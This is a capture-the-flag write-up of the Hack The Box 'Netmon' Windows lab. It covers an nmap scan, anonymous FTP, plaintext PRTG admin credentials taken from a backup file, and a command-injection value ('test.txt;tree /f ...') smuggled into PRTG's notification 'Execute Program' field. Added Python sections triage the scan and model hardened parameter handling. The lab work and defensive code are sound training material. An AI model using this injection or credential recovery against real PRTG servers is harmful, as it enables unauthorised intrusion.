HTB box Netmon (Windows) writeup


Netmon-Windows

https://www.hackthebox.eu/home/machines/profile/177
IP: 10.10.10.152

nmap scan

Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-10 19:45 CST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:45
Completed NSE at 19:45, 0.00s elapsed
Initiating NSE at 19:45
Completed NSE at 19:45, 0.00s elapsed
Initiating Ping Scan at 19:45
Scanning 10.10.10.152 [4 ports]
Completed Ping Scan at 19:45, 0.32s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:45
Completed Parallel DNS resolution of 1 host. at 19:45, 0.03s elapsed
Initiating SYN Stealth Scan at 19:45
Scanning 10.10.10.152 [1000 ports]
Discovered open port 135/tcp on 10.10.10.152
Discovered open port 139/tcp on 10.10.10.152
Discovered open port 445/tcp on 10.10.10.152
Discovered open port 80/tcp on 10.10.10.152
Discovered open port 21/tcp on 10.10.10.152
Increasing send delay for 10.10.10.152 from 0 to 5 due to 23 out of 56 dropped probes since last increase.
Completed SYN Stealth Scan at 19:46, 51.60s elapsed (1000 total ports)
Initiating Service scan at 19:46
Scanning 5 services on 10.10.10.152
Completed Service scan at 19:46, 11.53s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.152
Retrying OS detection (try #2) against 10.10.10.152
Retrying OS detection (try #3) against 10.10.10.152
Retrying OS detection (try #4) against 10.10.10.152
Retrying OS detection (try #5) against 10.10.10.152
Initiating Traceroute at 19:46
Completed Traceroute at 19:46, 0.36s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 19:46
Completed Parallel DNS resolution of 2 hosts. at 19:46, 0.04s elapsed
NSE: Script scanning 10.10.10.152.
Initiating NSE at 19:46
NSE: [ftp-bounce] PORT response: 501 Server cannot accept argument.
Completed NSE at 19:46, 11.52s elapsed
Initiating NSE at 19:46
Completed NSE at 19:46, 0.00s elapsed
Nmap scan report for 10.10.10.152
Host is up (0.30s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19  12:18AM                 1024 .rnd
| 02-25-19  10:15PM       <DIR>          inetpub
| 07-16-16  09:18AM       <DIR>          PerfLogs
| 02-25-19  10:56PM       <DIR>          Program Files
| 02-03-19  12:28AM       <DIR>          Program Files (x86)
| 02-03-19  08:08AM       <DIR>          Users
|_02-25-19  11:49PM       <DIR>          Windows
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-favicon: Unknown favicon MD5: 36B3EF286FA4BEFBB797A0966B456479
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 15s, deviation: 0s, median: 15s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-06-10 19:47:00
|_  start_date: 2019-06-10 18:23:19

TRACEROUTE (using port 25/tcp)
HOP RTT       ADDRESS
1   341.39 ms 10.10.14.1
2   341.99 ms 10.10.10.152

NSE: Script Post-scanning.
Initiating NSE at 19:46
Completed NSE at 19:46, 0.00s elapsed
Initiating NSE at 19:46
Completed NSE at 19:46, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.12 seconds
           Raw packets sent: 1275 (60.374KB) | Rcvd: 1540 (139.830KB)
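A small triage pass over the scan above, added here as an example (it is not part of the original writeup and not an nmap feature): it parses plain-text nmap -sV output, lists the open ports, and flags the three findings a defender should act on first: anonymous FTP, SMB signing that is disabled or not required, and a PRTG build below 18.2.39, the version the writeup names as the fix for the command-injection bug. The SAMPLE text is a constructed excerpt of the report shown above.

```python
"""Triage nmap -sV output for the findings that matter on this box.

Added example (not from the writeup): parses plain-text nmap output and
flags anonymous FTP, SMB signing weaknesses and a PRTG build below 18.2.39.
SAMPLE is a constructed excerpt of the scan shown on the page.
"""
import re
from typing import Dict, List, Tuple

# Constructed excerpt of the scan output from the page (not the full report).
SAMPLE = """\
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|_    Message signing enabled but not required
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")
PRTG_RE = re.compile(r"PRTG/(\d+)\.(\d+)\.(\d+)")
PRTG_FIXED = (18, 2, 39)  # from the page: "PRTG < 18.2.39 Command Injection"


def parse_open_ports(text: str) -> List[Tuple[int, str, str]]:
    """Return (port, service, version) for each 'open' port line in the report."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append((int(m.group(1)), m.group(3), m.group(4).strip()))
    return ports


def triage(text: str) -> Dict[str, str]:
    """Map a finding id to a short explanation for every risk the scan shows."""
    findings: Dict[str, str] = {}
    if "Anonymous FTP login allowed" in text:
        findings["anonymous-ftp"] = "FTP accepts anonymous logins; review what the FTP root exposes"
    if re.search(r"message_signing:\s*disabled", text):
        findings["smb1-signing-disabled"] = "SMB1 message signing disabled: relay and tampering risk"
    if "Message signing enabled but not required" in text:
        findings["smb2-signing-not-required"] = "SMB2 signing supported but not enforced"
    m = PRTG_RE.search(text)
    if m:
        build = tuple(int(x) for x in m.groups())
        if build < PRTG_FIXED:
            findings["prtg-outdated"] = (
                "PRTG %d.%d.%d is below 18.2.39, the command-injection fix" % build
            )
    return findings


if __name__ == "__main__":
    for port, svc, ver in parse_open_ports(SAMPLE):
        print(f"{port:>5}  {svc:<13} {ver}")
    for fid, why in triage(SAMPLE).items():
        print(f"[!] {fid}: {why}")
```

Run it on a saved `nmap -sV -sC` report instead of SAMPLE to get the same port list and finding ids; the version comparison is a plain tuple compare, so extend PRTG_FIXED or add further product checks in the same style.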


Anonymous FTP login

FTP allows anonymous access:

user.txt is at /Users/Public/user.txt

Port 80 runs the PRTG Network Monitor service.
Under c:\Windows\ there is a batch file, restart.bat:

net stop PRTGCoreService
copy "c:\Windows\PRTG Configuration.dat" "C:\ProgramData\Paessler\PRTG Network Monitor"
net start PRTGCoreService

In the C:\ProgramData\Paessler\PRTG Network Monitor directory there is a backup file, PRTG Configuration.old.bak.

It contains the plaintext username prtgadmin and the password PrTg@dmin2018. Logging in with that password fails, but PrTg@dmin2019 logs in successfully.

Login successful

Searching for known vulnerabilities

A Google search for PRTG vulnerabilities turns up "PRTG < 18.2.39 Command Injection Vulnerability".

Result: there is a command execution vulnerability in Notifications under the Devices menu.
Under Execute Program, set the parameter as shown in the figure below and save the settings.

test.txt;tree /f c:\Users\Administrator > c:\output.txt
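Why that parameter runs a second command, and what a notification "Execute Program" field should do instead, as an added example (this is not PRTG's code and not from the writeup; the program name notify.exe is a placeholder). The vulnerable path concatenates the user-supplied parameter into one command line for a shell that treats `;` as a command separator, which is what the payload on the page relies on; the hardened path allow-lists the parameter and passes it as a single argv element with no shell. Nothing here executes a command; both paths only return what they would run.

```python
"""Model of an "Execute Program" notification parameter: vulnerable vs hardened.

Added example, not PRTG's code. 'notify.exe' is a placeholder program name.
The shell model is simplified to a separator split on ';'.
"""
import re
from typing import List

# Characters that let a shell chain, redirect or expand commands.
SHELL_METACHARS = re.compile(r"[;&|<>`$\r\n^%]")
# Allow-list for a notification parameter: a plain file name or simple token.
PARAM_ALLOWED = re.compile(r"^[A-Za-z0-9._-]{1,64}$")

# The parameter value from the writeup, and a benign one for comparison.
INJECTED = "test.txt;tree /f c:\\Users\\Administrator > c:\\output.txt"
BENIGN = "test.txt"


def vulnerable_command_line(program: str, parameter: str) -> str:
    """Vulnerable: one string handed to a shell; ';' ends the intended command."""
    return f"{program} {parameter}"


def split_as_shell_would(command_line: str) -> List[str]:
    """Simplified shell model: separate commands are split on ';'."""
    return [part.strip() for part in command_line.split(";") if part.strip()]


def validate_parameter(parameter: str) -> bool:
    """Accept only allow-listed tokens that contain no shell metacharacters."""
    return bool(PARAM_ALLOWED.match(parameter)) and not SHELL_METACHARS.search(parameter)


def hardened_argv(program: str, parameter: str) -> List[str]:
    """Hardened: validate, then pass the parameter as one argv element (no shell)."""
    if not validate_parameter(parameter):
        raise ValueError("notification parameter rejected: %r" % parameter)
    return [program, parameter]


if __name__ == "__main__":
    line = vulnerable_command_line("notify.exe", INJECTED)
    print("vulnerable path would run:", split_as_shell_would(line))
    print("hardened path, benign:", hardened_argv("notify.exe", BENIGN))
    try:
        hardened_argv("notify.exe", INJECTED)
    except ValueError as err:
        print("hardened path, injected:", err)
```

The argv form is what `subprocess.run([...])` (or CreateProcess with an explicit argument list) consumes; the allow-list is deliberately narrow because a notification parameter has no legitimate need for separators or redirection, and rejected values are worth logging as a detection signal.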

On the Devices page, one DNS server is in a down state.

Add a notification there, as shown below:

add triggers

Object Triggers

The result, output.txt, then appears in FTP.

To try exporting root.txt from the Desktop, change the Execute Program parameter in Notifications under the Devices menu to:

View the returned result in FTP:


Author: Geekby
Copyright: Unless otherwise stated, all articles on this blog are licensed under CC BY 4.0. Please credit Geekby as the source when reposting!